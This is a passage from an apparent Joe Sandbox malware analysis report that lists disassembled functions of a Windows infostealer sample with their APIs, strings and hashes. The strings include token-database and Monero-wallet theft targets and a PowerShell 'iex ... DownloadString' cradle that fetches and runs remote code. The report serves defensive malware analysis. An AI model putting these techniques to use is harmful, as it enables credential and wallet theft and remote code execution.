                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: f64068d1bf914bc0a2266021e94e64a7761af3adca8955f7e6b245b87737b1e4
                                • Instruction ID: 9fc5cf0196c3ef9c8f22831a7b196aab928b32fbb43c9828ddb19f328fbec625
                                • Opcode Fuzzy Hash: f64068d1bf914bc0a2266021e94e64a7761af3adca8955f7e6b245b87737b1e4
                                • Instruction Fuzzy Hash: FBB116719101049BEF14FBA4DD96EEE73B8AF54300F4045A9F506B61A1EF386A49CB72
                                Function 00B86770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 425a340f8062402f25dd3976f0819fb7b5878c3a3efdfe2e77caa57c1578dbe0
                                • Instruction ID: af790af2707967f38f16c236668853d95fbf665a9c647fd78c93988d6247f79c
                                • Opcode Fuzzy Hash: 425a340f8062402f25dd3976f0819fb7b5878c3a3efdfe2e77caa57c1578dbe0
                                • Instruction Fuzzy Hash: CEF03A34D08349EFE344AFE8A90972C7B70FB04702F040299E609C6390DA724E41DBE6
                                Function 00B74FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B74FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B74FD1
                                • InternetOpenA.WININET(00B90DDF,00000000,00000000,00000000,00000000), ref: 00B74FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00B75011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00B75041
                                • InternetCloseHandle.WININET(?), ref: 00B750B9
                                • InternetCloseHandle.WININET(?), ref: 00B750C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 3ae585b8b70c08258008bcbcabf2672b615c34c71b613e9b77226358c83e2eae
                                • Instruction ID: d6d248ffd15abf3816c7cfb56130999690023d6293c1dc201bafef8574a0130d
                                • Opcode Fuzzy Hash: 3ae585b8b70c08258008bcbcabf2672b615c34c71b613e9b77226358c83e2eae
                                • Instruction Fuzzy Hash: 87310AB4A00218EBDB20DF54DC85BDCB7B4EB48704F1081D9E709A7281DB706EC58FA9
                                Function 00B883DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00B88426
                                • wsprintfA.USER32 ref: 00B88459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00B8847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B8848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B88499
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                • RegQueryValueExA.ADVAPI32(00000000,0093DCB0,00000000,000F003F,?,00000400), ref: 00B884EC
                                • lstrlen.KERNEL32(?), ref: 00B88501
                                • RegQueryValueExA.ADVAPI32(00000000,0093DC38,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00B90B34), ref: 00B88599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B88608
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B8861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: c91b1f52898ba592cb0962c91213f35e1577860670880de0e992ca095619301c
                                • Instruction ID: 69b8e7b6967821528e0f72d9e74d0dee22dfc20a0aafc075fc55dc5f8275840b
                                • Opcode Fuzzy Hash: c91b1f52898ba592cb0962c91213f35e1577860670880de0e992ca095619301c
                                • Instruction Fuzzy Hash: DF2107B5910218EBDB24DB54DC85FE9B3F8FB48700F40C2D9A609A6250DF71AA85CFE4
                                Function 00B87690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B876A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B876AB
                                • RegOpenKeyExA.ADVAPI32(80000002,0092B6C8,00000000,00020119,00000000), ref: 00B876DD
                                • RegQueryValueExA.ADVAPI32(00000000,0093DDE8,00000000,00000000,?,000000FF), ref: 00B876FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B87708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 7db1daa6f6c5f210d02b747fe63adacca29de7c9494b6232d9eade502f931c31
                                • Instruction ID: 6d048d083d8943b2b41b5aac3b943e1cc29b4549f14cec6c3e47e71743b1be11
                                • Opcode Fuzzy Hash: 7db1daa6f6c5f210d02b747fe63adacca29de7c9494b6232d9eade502f931c31
                                • Instruction Fuzzy Hash: 97014FB9A44308FBDB00EBE8DC49F69B7F8EB48705F104595FA05D7390EA709900CB61
                                Function 00B87720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B87734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B8773B
                                • RegOpenKeyExA.ADVAPI32(80000002,0092B6C8,00000000,00020119,00B876B9), ref: 00B8775B
                                • RegQueryValueExA.ADVAPI32(00B876B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00B8777A
                                • RegCloseKey.ADVAPI32(00B876B9), ref: 00B87784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 496728ced04c98a8a5b22bd604df69ab0aac3766e49ee3deba4cf07b65cdd4ff
                                • Instruction ID: ef851e0e5d4ba2ee078da6ce6c9772b39b90a31a648ec9124697ddc4a19b9ded
                                • Opcode Fuzzy Hash: 496728ced04c98a8a5b22bd604df69ab0aac3766e49ee3deba4cf07b65cdd4ff
                                • Instruction Fuzzy Hash: 4301F4B9A40308FBDB00DBE4DC49FAEB7B8EB44705F104595FA05E7391DA749900CB61
                                Function 00B799C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B799EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B79A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00B79A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,00B7148F,00000000), ref: 00B79A5A
                                • LocalFree.KERNEL32(00B7148F), ref: 00B79A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00B79A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 1bbe5b45fe1d585cbf4deff921e12f5b36dee83bb52aa7ea58e3a4465d655416
                                • Instruction ID: d725c8ab0f22bb7a81f78bc95fd96740386b17d2d3c313cecbd50488d4b4a996
                                • Opcode Fuzzy Hash: 1bbe5b45fe1d585cbf4deff921e12f5b36dee83bb52aa7ea58e3a4465d655416
                                • Instruction Fuzzy Hash: C231F4B4A01209EFDB14DFA4C985BAE77F5FF48350F108198E915A7390D778AA41CFA1
                                Function 00B84780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcat.KERNEL32(?,0093DF08), ref: 00B847DB
                                  • Part of subcall function 00B88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B88E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00B84801
                                • lstrcat.KERNEL32(?,?), ref: 00B84820
                                • lstrcat.KERNEL32(?,?), ref: 00B84834
                                • lstrcat.KERNEL32(?,0092AE88), ref: 00B84847
                                • lstrcat.KERNEL32(?,?), ref: 00B8485B
                                • lstrcat.KERNEL32(?,0093D4F8), ref: 00B8486F
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B88D90: GetFileAttributesA.KERNEL32(00000000,?,00B71B54,?,?,00B9564C,?,?,00B90E1F), ref: 00B88D9F
                                  • Part of subcall function 00B84570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B84580
                                  • Part of subcall function 00B84570: RtlAllocateHeap.NTDLL(00000000), ref: 00B84587
                                  • Part of subcall function 00B84570: wsprintfA.USER32 ref: 00B845A6
                                  • Part of subcall function 00B84570: FindFirstFileA.KERNEL32(?,?), ref: 00B845BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: 955d0c911d009a0b10e9de55e00052f4f29114c6d21b6ae7d7abb8e423fcf795
                                • Instruction ID: 1e2c4ae59d18d90e3f1cd3fc907cc227932f2226b7c866a420f07d91baf24d76
                                • Opcode Fuzzy Hash: 955d0c911d009a0b10e9de55e00052f4f29114c6d21b6ae7d7abb8e423fcf795
                                • Instruction Fuzzy Hash: 953180B6900308E7CB14FBB4DC85EED73BCAB58700F4045C9B31996191EE749789CBA5
                                Function 00B82C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00B82D85
                                Strings
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00B82CC4
                                • ')", xrefs: 00B82CB3
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00B82D04
                                • <, xrefs: 00B82D39
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: e234fe36fc20c4b79f8027f13cc9faf2f536abb063c2ed0ffb0044671ba49177
                                • Instruction ID: 6552971a487fd303e7c021cbc9cf9b1efac2ed1e8fa61577f90f1f97ce4bdfbd
                                • Opcode Fuzzy Hash: e234fe36fc20c4b79f8027f13cc9faf2f536abb063c2ed0ffb0044671ba49177
                                • Instruction Fuzzy Hash: 8B41A271D102089BEB14FFA0C891BDDB7B8AF14300F5041AAF116B71A1DF786A4ACFA1
                                Function 00B79E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                Download Yara Rule
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00B79F41
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: 343ccf7519a7c25c34c494eb5e1bffa265e2e693dd9ef8adee256388f11e6080
                                • Instruction ID: 8e85c8a3cedb71a7b5129986bc83f7e1aeb736627a38b17263cd7fed618a505f
                                • Opcode Fuzzy Hash: 343ccf7519a7c25c34c494eb5e1bffa265e2e693dd9ef8adee256388f11e6080
                                • Instruction Fuzzy Hash: 11611075A10248DFDB28EFA8CC96FED77F5AF44300F008558F91A5B191EB746A05CBA2
                                Function 00B840B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,0093D6B8,00000000,00020119,?), ref: 00B840F4
                                • RegQueryValueExA.ADVAPI32(?,0093DF80,00000000,00000000,00000000,000000FF), ref: 00B84118
                                • RegCloseKey.ADVAPI32(?), ref: 00B84122
                                • lstrcat.KERNEL32(?,00000000), ref: 00B84147
                                • lstrcat.KERNEL32(?,0093DE00), ref: 00B8415B
                                Memory Dump Source
